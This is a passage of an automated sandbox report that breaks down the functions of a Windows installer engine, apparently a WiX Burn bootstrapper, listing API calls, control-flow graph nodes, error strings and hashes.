                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0086406E
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00864095
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008640B0
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 008640E6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                                                                                                                                                                  • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1544372074-1252831301
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b32dbe1b5db2809a67adf2e08e89032016b7281723575df8ed5d3832045b86d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f07bcd12bd05561e6bf24c06f6174303b88756333899db820ca4a3380e4c451
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b32dbe1b5db2809a67adf2e08e89032016b7281723575df8ed5d3832045b86d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47B1DA72D41639ABDB315A648C05B9EB679FF40760F0302A5EE08FB191DB729E90CF91
                                                                                                                                                                                                                                                                                                  Function 00865195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 594 865195-865243 call 88f8e0 * 2 GetModuleHandleW call 8a04f8 call 8a06ae call 86120a 605 865245 594->605 606 865259-86526a call 8642d7 594->606 608 86524a-865254 call 8a0237 605->608 612 865273-86528f call 865618 CoInitializeEx 606->612 613 86526c-865271 606->613 614 8654d4-8654db 608->614 622 865291-865296 612->622 623 865298-8652a4 call 89fcae 612->623 613->608 616 8654dd-8654e3 call 8a5636 614->616 617 8654e8-8654ea 614->617 616->617 620 8654ec-8654f3 617->620 621 8654fa-865518 call 86d82f call 87a8d6 call 87ab24 617->621 620->621 624 8654f5 call 8741ec 620->624 643 865546-865559 call 864fa4 621->643 644 86551a-865522 621->644 622->608 631 8652a6 623->631 632 8652b8-8652c7 call 8a0e07 623->632 624->621 635 8652ab-8652b3 call 8a0237 631->635 639 8652d0-8652df call 8a2af7 632->639 640 8652c9-8652ce 632->640 635->614 650 8652e1-8652e6 639->650 651 8652e8-8652f7 call 8a3565 639->651 640->635 655 865560-865567 643->655 656 86555b call 8a3a35 643->656 644->643 646 865524-865527 644->646 646->643 649 865529-865544 call 87434c call 865602 646->649 649->643 650->635 665 865300-86531f GetVersionExW 651->665 666 8652f9-8652fe 651->666 660 86556e-865575 655->660 661 865569 call 8a2efe 655->661 656->655 662 865577 call 8a1479 660->662 663 86557c-865583 660->663 661->660 662->663 669 865585 call 89fdbd 663->669 670 86558a-86558c 663->670 672 865321-86532b GetLastError 665->672 673 865359-86539e call 8633c7 call 865602 665->673 666->635 669->670 676 865594-86559b 670->676 677 86558e CoUninitialize 670->677 678 86532d-865336 672->678 679 865338 672->679 696 8653a0-8653ab call 8a5636 673->696 697 8653b1-8653c1 call 87752a 673->697 683 8655d6-8655df call 8a0113 676->683 684 86559d-86559f 676->684 677->676 678->679 680 86533f-865354 call 863821 679->680 681 86533a 679->681 680->635 681->680 694 8655e6-8655ff call 8a0802 call 88e06f 683->694 695 8655e1 call 8645ee 683->695 688 8655a5-8655ab 684->688 689 8655a1-8655a3 684->689 693 8655ad-8655c6 call 873d85 call 865602 688->693 689->693 693->683 712 8655c8-8655d5 call 865602 693->712 695->694 696->697 709 8653c3 697->709 710 8653cd-8653d6 697->710 709->710 713 86549e-8654ab call 864d39 710->713 714 8653dc-8653df 710->714 712->683 724 8654b0-8654b4 713->724 717 865476-865492 call 864ae5 714->717 718 8653e5-8653e8 714->718 730 8654c0-8654d2 717->730 734 865494 717->734 721 86544e-86546a call 8648ef 718->721 722 8653ea-8653ed 718->722 721->730 736 86546c 721->736 726 865426-865442 call 864a88 722->726 727 8653ef-8653f2 722->727 729 8654b6 724->729 724->730 726->730 739 865444 726->739 732 8653f4-8653f9 727->732 733 865403-865416 call 864c86 727->733 729->730 730->614 732->733 733->730 741 86541c 733->741 734->713 736->717 739->721 741->726
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00865217
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A04F8: InitializeCriticalSection.KERNEL32(008CB5FC,?,00865223,00000000,?,?,?,?,?,?), ref: 008A050F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0086523F,00000000,?), ref: 00861248
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086120A: GetLastError.KERNEL32(?,?,?,0086523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00861252
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00865285
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008A0E28
                                                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00865317
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00865321
                                                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0086558E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to initialize core., xrefs: 008653C3
                                                                                                                                                                                                                                                                                                  • Failed to initialize engine state., xrefs: 0086526C
                                                                                                                                                                                                                                                                                                  • Failed to run per-machine mode., xrefs: 0086546C
                                                                                                                                                                                                                                                                                                  • Failed to run untrusted mode., xrefs: 008654B6
                                                                                                                                                                                                                                                                                                  • Failed to initialize Regutil., xrefs: 008652C9
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 00865245
                                                                                                                                                                                                                                                                                                  • Failed to run RunOnce mode., xrefs: 0086541C
                                                                                                                                                                                                                                                                                                  • Failed to get OS info., xrefs: 0086534F
                                                                                                                                                                                                                                                                                                  • Failed to initialize Wiutil., xrefs: 008652E1
                                                                                                                                                                                                                                                                                                  • Failed to run per-user mode., xrefs: 00865494
                                                                                                                                                                                                                                                                                                  • Failed to initialize XML util., xrefs: 008652F9
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM., xrefs: 00865291
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 00865345
                                                                                                                                                                                                                                                                                                  • Failed to run embedded mode., xrefs: 00865444
                                                                                                                                                                                                                                                                                                  • 3.11.1.2318, xrefs: 00865384
                                                                                                                                                                                                                                                                                                  • Failed to initialize Cryputil., xrefs: 008652A6
                                                                                                                                                                                                                                                                                                  • Invalid run mode., xrefs: 008653F9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                                                                                                                                                                  • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3262001429-510904028
                                                                                                                                                                                                                                                                                                  • Opcode ID: ec113dd112c6bcb3025cbe235f2a11a46da63e7f4cb56d4015d1ccd0205e2b5e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8465405db52b8146bf323895aa471f427ba399cf9bd59bd12de9e004f7984d27
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec113dd112c6bcb3025cbe235f2a11a46da63e7f4cb56d4015d1ccd0205e2b5e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14B1A271D40A399BEB32AB68CC56BED76A5FF05710F0601E5E908E6341DB749E80CF92
                                                                                                                                                                                                                                                                                                  Function 008A304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008A3609,00000000,?,00000000), ref: 008A3069
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0088C025,?,00865405,?,00000000,?), ref: 008A3075
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 008A30B5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008A30C1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 008A30CC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008A30D6
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(008CB6B8,00000000,00000001,008AB818,?,?,?,?,?,?,?,?,?,?,?,0088C025), ref: 008A3111
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 008A31C0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2124981135-499589564
                                                                                                                                                                                                                                                                                                  • Opcode ID: 22733e0b17ca77e1436a47894306cc4b504fde919a8c27d6a454e1b0695a42c2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 09f5f3740c18933044ea9fc87e2a35d541f5cdce09df57d15e5ac1b335e3ba85
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22733e0b17ca77e1436a47894306cc4b504fde919a8c27d6a454e1b0695a42c2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F419F31A01615ABEB249FA8C845FAEBBB8FF46710F114179F901EBB41DB75DE008B90
                                                                                                                                                                                                                                                                                                  Function 00861070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008633C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008610DD,?,00000000), ref: 008633E8
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 008610F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861186
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861191
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0086119F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008611C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611D7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,008AB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00861131
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                                                                                                                                                  • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3687706282-3151496603
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c305821e591ed8b3caf7e299a0e81ed3d5b0eb8021c567102a28fa0040cc687
                                                                                                                                                                                                                                                                                                  • Instruction ID: 56a5e32266fcf0d1cd6c04024c810e328b9fbaccf5650fc671a113a21d8535c9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c305821e591ed8b3caf7e299a0e81ed3d5b0eb8021c567102a28fa0040cc687
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E121607190121CABEF109FA8DC49BDEBBB8FB0A714F554115EA10F7292D77099088BA5
                                                                                                                                                                                                                                                                                                  Function 0089FEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(008CB5FC,00000000,?,?,?,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0089FEF4
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0089FF04
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0089FF0D
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(8007139F,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0089FF23
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(008CB5FC,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008A001A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0089FFC0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                                                                                                                                                  • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 296830338-59366893
                                                                                                                                                                                                                                                                                                  • Opcode ID: d48a4cf6309e109037f43a52f7fb9bed90decd3b3bb36fb05d51182479efd008
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a2ce312a7cd398923eb417996aecb2177a92efd58d1e09625ac8e17ffc7c3e1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d48a4cf6309e109037f43a52f7fb9bed90decd3b3bb36fb05d51182479efd008
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC416E71D01619ABEF259FA4D805FBEB7B8FB09711F140029FA01E6251EB349D40DBA1
                                                                                                                                                                                                                                                                                                  Function 0087A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder., xrefs: 0087A116
                                                                                                                                                                                                                                                                                                  • Failed to calculate working folder to ensure it exists., xrefs: 0087A0D8
                                                                                                                                                                                                                                                                                                  • Failed create working folder., xrefs: 0087A0EE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                                                                                                                                                  • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                                                                                                                                                  • API String ID: 3841436932-2072961686
                                                                                                                                                                                                                                                                                                  • Opcode ID: ff76e82eb85ab95dd55c708b4e2d14a2121a66b5b95d3c22791ffd0f2bda2d70
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7736e331225abcfe36d2e86d8afa600ba851b9db44efa304675be93cb647a9d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff76e82eb85ab95dd55c708b4e2d14a2121a66b5b95d3c22791ffd0f2bda2d70
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD012432900928FA9B279A49CC06C9EBB79FF81720B108251F804F6214EB35DE10A692
                                                                                                                                                                                                                                                                                                  Function 008948D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002,00000000), ref: 008948F9
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002,00000000), ref: 00894900
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00894912
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f35cfff7b4db1996aaa3e34ff135e5f9590bf2f9eb768631212b6600b29e7a79
                                                                                                                                                                                                                                                                                                  • Instruction ID: 96189136a181cacfc2991c2129e305463955970a48e1ba2c1ff75dcdb6f07fe3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f35cfff7b4db1996aaa3e34ff135e5f9590bf2f9eb768631212b6600b29e7a79
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0B631410248AFDF11BF95DD09E493F69FF46791B084014F85A8A533DB35DD53CA80
                                                                                                                                                                                                                                                                                                  Function 0086394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 994b5f5b723d0036611d9ab90d543634c9d4b14e690f026cc3f0b122f380585b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 020fb346a9f971b2454136aeb932a1dd6fd3b4ce206e7a267a08c7e76bce6517
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 994b5f5b723d0036611d9ab90d543634c9d4b14e690f026cc3f0b122f380585b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62C012321A420CAB8B006FF8EC1EC9A3BACBB296027048510B905C3521C738E0108B60
                                                                                                                                                                                                                                                                                                  Function 0086F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
